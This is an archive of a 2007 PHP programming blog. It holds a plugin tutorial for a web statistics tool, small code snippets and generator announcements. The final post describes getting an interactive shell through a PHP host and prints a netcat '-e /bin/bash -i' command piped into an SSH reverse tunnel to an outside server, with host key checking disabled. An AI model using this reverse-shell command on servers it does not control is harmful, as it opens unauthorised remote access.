Archive for the ‘PHP’ Category

Obsessive Web Statistics (OWS) analysis plugin tutorial

Saturday, September 1st, 2007

This is a short tutorial on how to write an analysis plugin for Obsessive Web Statistics (OWS). OWS is designed first and foremost to be plugin friendly, and as you will see, adding useful functionality in the form of plugins is not hard at all and can be done in just a few lines of code. We are going to add DNS hostname resolving to OWS.

What is an analysis plugin?

An analysis plugin performs analysis on the parsed logfile data, and stores that information in the database dimensions. OWS has wrapped all of this stuff in a nice easy to use abstraction layer so that you won’t need to make actual SQL queries if you don’t want to.

Implementation

All OWS plugins are implemented as PHP classes. This is the bare skeleton that all OWS plugins should define.

class OWSDNS implements iPlugin{

	// this should return a unique ID identifying the plugin, should start with an alpha,
	// should use basename instead of just __FILE__ otherwise it could expose path information
	public function getPluginId(){
		return 'p'. md5(basename(__FILE__) . get_class($this));
	}

	// returns an associative array describing the plugin
	public function getPluginInformation(){

		return array(

			'pluginName' => 'Name of plugin',
			'aboutUrl' => 'http://information.about.plugin',

			'author' => 'author',
			'url' => 'http://developers.website',

			'description' => 'Description of what plugin does'
		);
	}
}

You should notice we define two functions — getPluginId() and getPluginInformation(). These must be defined by any OWS plugin, and are used to identify the plugin in a number of instances. This plugin also implements iPlugin. All interfaces are defined (with plenty of comments) in include/plugin_interfaces.inc.php. A plugin can implement as many interfaces as it needs to. There are a few types, but the one we are going to implement is iAnalysisPlugin. We will do so by changing the first part to:

class OWSDNS implements iPlugin, iAnalysisPlugin {

Additionally, we need to register the plugin with OWS so that it knows what kind of plugin you are defining. Add this to the end of your source file:

register_plugin('analysis',new OWSDNS());

An analysis plugin needs to implement the following functions:

define_dimensions
InitializeAnalysis
preAnalysis
getPrimaryNode
getAttributes
postAnalysis

All of these functions are documented in include/plugin_interfaces.inc.php if you need more comprehensive information.

Now, OWS stores data in multiple dimensions. Each dimension has a ‘primary node’, which is the main data element of the dimension and always has the same name as the dimension. Each primary node can have multiple attributes defined about it. Plugins can define new dimensions or extend existing dimensions.

Right now, OWS stores only the host address — which is an IP address representing the visitor. What our plugin needs to do is resolve this address, and store it as an attribute of the dimension. So, we need to extend the dimension ‘host’, which we can do using the function define_dimensions().

// this function should return a set of arrays that define the dimensions
// and attributes that this plugin defines. You should not specify an attribute
// that another plugin defines. This is not website dependent.
public function define_dimensions(){

	return array(
		'host' => array(
			'hostname' => attribute_defn('varchar',254,16)
		)
	);
}

Pretty simple, eh? See, the array returned means that we are defining inside dimension ‘host’, an attribute named ‘hostname’. The function attribute_defn is used to define the SQL type that our attribute has, so the installer can create it for us. Now, we can write the actual analysis part.

At the beginning of analysis, the function InitializeAnalysis is called in case the plugin needs to do something before the analysis begins. This function is called once per website analyzed. Our plugin isn’t going to need this, so we just return true.

public function InitializeAnalysis($website){
	return true;
}

Now, after all plugins are initialized, then the logfile lines are read from the logfile (or from the database in the case of an install or in the case of reanalysis). It is read in phases, which consist of 4 steps:

preAnalysis
getPrimaryNode
getAttributes
postAnalysis

Now, preAnalysis and postAnalysis are only called once per phase, but getPrimaryNode is typically called at least once per logfile line. Our plugin doesn’t use getPrimaryNode — getPrimaryNode is only used for plugins that define new dimensions in define_dimensions. If you don’t define a primary node, then you should return false and show an error.

It should also be noted that our plugin doesn’t need to do any preAnalysis or postAnalysis, so we can just return true.

public function preAnalysis($website,&$ids){
	return true;
}

public function getPrimaryNode($website, $dimension, $line){
	return show_error("Invalid dimension passed to plugin \"" . get_class($this) . "\"");
}

public function postAnalysis($website,&$ids){
	return true;
}

Now we get to the part that actually does the work. The function getAttributes needs to return an array representing the attributes that the plugin defines per dimension. The $dimension argument is passed in to the function, and we should only do analysis on the primary node. The contents of the primary node are passed in to the function as well. This makes sense, because attributes of the primary node should be discernible by only looking at the primary node itself. If this is not the case, then you should probably be defining a new dimension instead.

This function should return an array of attributes/values in the form of:

	array('attribute' => 'value', ...)

Note: The returned values can be cached (for performance reasons), so this function may NOT always be called for each row. You should ALWAYS return an array with the same keys each time, in the same order that you defined them in define_dimensions. Of course, if you do not define any attributes in the dimension passed in the $dimension parameter, or if there is an error, then return false.
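The "same keys, same order" rule is easy to check mechanically while developing a plugin. The following is only a sketch: attributes_match_definition() is a made-up helper, not part of OWS, and the definition value is a placeholder string rather than a real attribute_defn() result.

```php
<?php
// Hypothetical helper, not part of OWS: checks that the keys returned by
// getAttributes() match, in order, the attributes declared for a dimension
// in define_dimensions().
function attributes_match_definition(array $defined, $dimension, array $returned){

	// the plugin declares nothing for this dimension
	if (!array_key_exists($dimension, $defined))
		return false;

	// === on two key lists requires the same keys in the same order
	return array_keys($defined[$dimension]) === array_keys($returned);
}

// placeholder definition, standing in for what define_dimensions() returns
$defined = array('host' => array('hostname' => 'placeholder definition'));

$ok = attributes_match_definition($defined, 'host', array('hostname' => 'example.org'));
```

Something like this could run in a development build only, since the check adds a little work to every row.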

Anyway, here’s the code for getAttributes:


public function getAttributes($website, $dimension, $pnode){

	if ($dimension != 'host')
		return show_error("Invalid dimension passed to plugin \"" . get_class($this) . "\" in getAttributes!");

	// return the hostname
	return array('hostname' => gethostbyaddr($pnode));

}

And that’s it! Wasn’t that easy? Of course, there are a lot more useful things we could implement to make this more polished. Now, after you install the plugin and run the analysis, the only filter you’ll be able to use on your new dimension attribute in the web interface is the manual analysis, since it allows analysis on all defined dimensions. But it would be a pretty trivial matter to either modify an existing filter plugin or create a new one. We’ll discuss this in the future.
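One possible bit of polish is to handle failed lookups and avoid resolving the same address twice. gethostbyaddr() returns false for malformed input and returns the address unchanged when the lookup fails, so both cases can be detected. This is a sketch under assumptions: resolve_hostname(), its $cache argument and the injectable $resolver are illustrative names, and storing an empty string for unresolved addresses is just one choice.

```php
<?php
// Sketch only: resolve_hostname() and its parameters are illustrative names,
// not part of the OWS plugin API.
function resolve_hostname($ip, array &$cache, $resolver = 'gethostbyaddr'){

	// reuse an earlier answer so each address is looked up at most once
	if (array_key_exists($ip, $cache))
		return $cache[$ip];

	$name = call_user_func($resolver, $ip);

	// gethostbyaddr() returns false for malformed input and hands back the
	// address unchanged when the lookup fails; store an empty string for both
	if ($name === false || $name === $ip)
		$name = '';

	return $cache[$ip] = $name;
}
```

Inside getAttributes this could be used as array('hostname' => resolve_hostname($pnode, $this->cache)), assuming the plugin class keeps a $cache array property. The return value still has the single key ‘hostname’ every time, which is what the caching note above asks for.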

Hope this helps you out. If you need help with OWS, or developing for OWS, don’t hesitate to ask! Leave your comments, or join the obsessive-compulsive mailing list!

Download this
Obsessive Website Statistics Website

Web Interface to the fortune program

Sunday, August 26th, 2007

I got bored last night, so I created a wrapper around the fortune program on my Gentoo box… then made it better with jQuery AJAX goodness. And then I combined it with my rndsay wrapper to make the fortunes be echoed by cows. 🙂 Of course, getting it to work on my host here has been annoying, but I finally got it working! Enjoy!

Random Fortune Generator

Source Code

PHP Snippet: Padded table on CLI

Thursday, August 2nd, 2007

While working on OWS, I created this neat little code snippet. It only took a few minutes to code, but it could be useful for someone looking for a routine to display a simple table on the command line in PHP. Here’s the code:

/*
	Pass this function an array of stuff and it displays a simple padded table. No borders.
*/
function show_console_table($rows, $prepend = '', $header = true){

	$max = array();

	// find max first
	foreach ($rows as $r)
		for ($i = 0;$i < count($r);$i++)
			$max[$i] = max(array_key_exists($i,$max) ? $max[$i] : 0 ,strlen($r[$i]));

	// add a header?
	if ($header){

		// remove the first element
		$row = array_shift($rows);

		echo "$prepend";
		for ($i = 0;$i < count($row);$i++)
			echo str_pad($row[$i],$max[$i]) . "  ";
		echo "\n$prepend" . str_repeat('=',array_sum($max) + count($max)*2) . "\n";

	}

	foreach($rows as $row){
		echo "$prepend";
		for ($i = 0;$i < count($row);$i++)
			echo str_pad($row[$i],$max[$i]) . "  ";
		echo "\n";
	}
}

Like I said, pretty simple, but quite useful too. Just pass the function an array of rows, and it outputs a space-padded table with an optional header. It’s probably been done already, but that’s my implementation. 🙂
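If you would rather capture the table than print it (for logging, say), the same idea can be written to return a string. This is a sketch of a variant, not a replacement for the routine above; the name format_console_table() is made up here.

```php
<?php
// Variant of show_console_table() that builds the table as a string.
// The name format_console_table() is made up for this sketch.
function format_console_table(array $rows, $prepend = '', $header = true){

	// find the widest cell in each column
	$max = array();
	foreach ($rows as $r)
		foreach (array_values($r) as $i => $cell)
			$max[$i] = max(isset($max[$i]) ? $max[$i] : 0, strlen($cell));

	$out = '';
	foreach (array_values($rows) as $n => $row){
		$out .= $prepend;
		foreach (array_values($row) as $i => $cell)
			$out .= str_pad($cell, $max[$i]) . "  ";
		$out .= "\n";

		// underline the first row when it is a header
		if ($header && $n == 0)
			$out .= $prepend . str_repeat('=', array_sum($max) + count($max) * 2) . "\n";
	}

	return $out;
}

// the first row is treated as the header
$table = format_console_table(array(
	array('Plugin', 'Type'),
	array('OWSDNS', 'analysis'),
));
```

Calling echo $table then prints the same kind of output as the original routine, with every column padded to its widest cell.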

Obsessive Web Statistics: Open Source Web 2.0 Website Statistics System

Wednesday, July 18th, 2007

For the last month or so, I’ve been working on a new PHP/MySQL/jQuery web application that I’ve decided to call “Obsessive Web Statistics” (OWS). A project has been created on Sourceforge for it, and I’m happy to finally announce the first file release for OWS! There are a number of features about OWS that give it an advantage over existing website statistics software.

Instead of generating static HTML reports like most website statistics programs, OWS takes your Apache logfiles and puts them into a MySQL database. A dynamic jQuery driven interface with a PHP backend allows you to manipulate the data and display it in useful ways. The interface is mostly intuitive and simple to use while providing powerful options to manipulate the data. For more information, you can visit the Sourceforge page or subscribe to the obsessive-compulsive mailing list (how crazy of a name is that? LoL. FYI: it’s only about development and help for OWS). An archived version of the list is available at Sourceforge as well.

Links:

Sourceforge website: http://obsessive.sourceforge.net

Demo Site: http://ows.mattas.net/

Many thanks to my friend Tony Mattas (http://www.mattas.net) for providing hosting for the OWS demo site!

A lesson well learned: Don’t seek() on STDIN

Wednesday, July 18th, 2007

The neat thing about fread() and friends in most languages is that you can open up STDIN and pretend it’s a file. However, the following code doesn’t work... hehe.

<?php
	$file = $argv[1];

	if ($file != '-' && !file_exists($file))
		die("File $file does not exist, foo!\n");
	if ($file == '-')
		$file = 'php://stdin';

	$f = fopen($file,'r');

	// crazy code in here

	// ok, go backwards
	fseek($f, $some_position);

	// Heh, it doesn't always work!?

?>

Yeah, I know it seems quite obvious from this small snippet, but for the record, the two calls were separated by quite a few lines of code and I didn’t quite realize that I was doing that… lol.
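One way around the problem is to check whether the stream is seekable and, if it is not, buffer it into a temporary stream first. This is a minimal sketch: make_seekable() is an illustrative name, and it assumes the ‘seekable’ flag from stream_get_meta_data() is accurate for the input and that the whole input fits in temporary storage.

```php
<?php
// Sketch: make_seekable() is an illustrative name. It returns a stream that
// fseek() can be used on, buffering the input first when necessary.
function make_seekable($stream){

	$meta = stream_get_meta_data($stream);
	if ($meta['seekable'])
		return $stream;

	// php://temp keeps data in memory and spills to a temporary file
	// once it grows past a size limit
	$copy = fopen('php://temp', 'w+');
	stream_copy_to_stream($stream, $copy);
	rewind($copy);

	return $copy;
}
```

In the snippet above, this would mean writing $f = make_seekable(fopen($file,'r')); instead of the plain fopen() call. The cost is that piped input is read to the end before any processing starts.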

LOLCat Creator Generator

Friday, July 6th, 2007

For those of you who have used my LOLCat Generator script, you’ll be happy to know that I’ve improved it slightly: using it on images that have white backgrounds now works decently. Things the LOLCat Creator can do:

  • Put a caption in any of the corners, with wordwrap
  • Generate from any one of the few random cat pictures I have on the site
  • Generate from any URL of an image that you give it

A lot of people have been using it, and there are some pretty amusing pictures that have been generated. I’ll have to post the best ones. 🙂

LOLCat Generator Page

LOLCat Generator in PHP

Friday, June 29th, 2007

Last night I had a discussion with my roommate and decided that it would be pretty trivial to make a PHP script that generated LOLCats, since everyone else was doing it. Of course, as far as I know there are no free LOLCat generator scripts, so without further ado, I present to you my open source LOLCat generator script. It includes a demo page to show how it’s supposed to work. There are a number of parameters you can adjust… it’s intended to be used as a library. You can download it from my software page.

LOLCats Generator page

Download Page: http://www.virtualroadside.com/download/lolcats-0.1.zip

LOLCat

Let me know if you find any bugs. 🙂

How to get remote SSH shell access on some servers running PHP

Saturday, June 2nd, 2007

I was trying to do an XML dump with MediaWiki for a friend, and the tools MediaWiki provides to do it require shell access, which my friend does not have in his hosting package. So I tried using phpshell, but got annoyed that it would freeze anytime I executed something that required user input. After much thought, I devised a way to create an SSH shell using PHP (sorta) that I could use. Here’s how you can do it too.

The Concept:

PHP can (usually) execute arbitrary executable files on the server that it resides on. If the executable forks, then it can open other programs or connect to remote resources, without hanging the PHP connection. I’ve written a program that does this, and executes a statement that connects to a remote SSH server, creates a tunnel to it, and opens a shell on that tunnel so that a user on the remote SSH server can connect to that port and use the shell. The statement looks like this:

netcat -l -p 20000 -s 127.0.0.1 -e "/bin/bash -i" | ssh -NR 20001:localhost:20000 username@hostname -o "StrictHostKeyChecking false" -i key_file_name

You can connect to this shell by doing a

netcat localhost 20001

on the remote SSH server. You need to set up an SSH key on both servers so that the authentication doesn’t ask you for a password at all (see below). Of course, if those programs don’t exist on the remote server then this won’t work (however, I have included a compiled version of gnu-netcat with the program that you can use).

The Usage:

This code works, but is still mostly a ‘proof of concept’.

Requirements:

  • You must be able to upload files to the server and ensure they are executable (though, the software tries to set the executable bits if it is not the case)
  • You must either be able to compile files in an executable format that the server can execute, or be able to compile files on the server itself (in which case, you probably don’t need this program!).
  • The user that the webserver (or the php CGI script) is running as must be able to write to a file
  • You need an accessible SSH server set up somewhere that you can add user accounts to
  • Forwarding must be enabled (default: yes)
  • Public key authentication must be enabled (default: yes)
  • It needs to have netcat installed
  • I used Linux to set this up

(more…)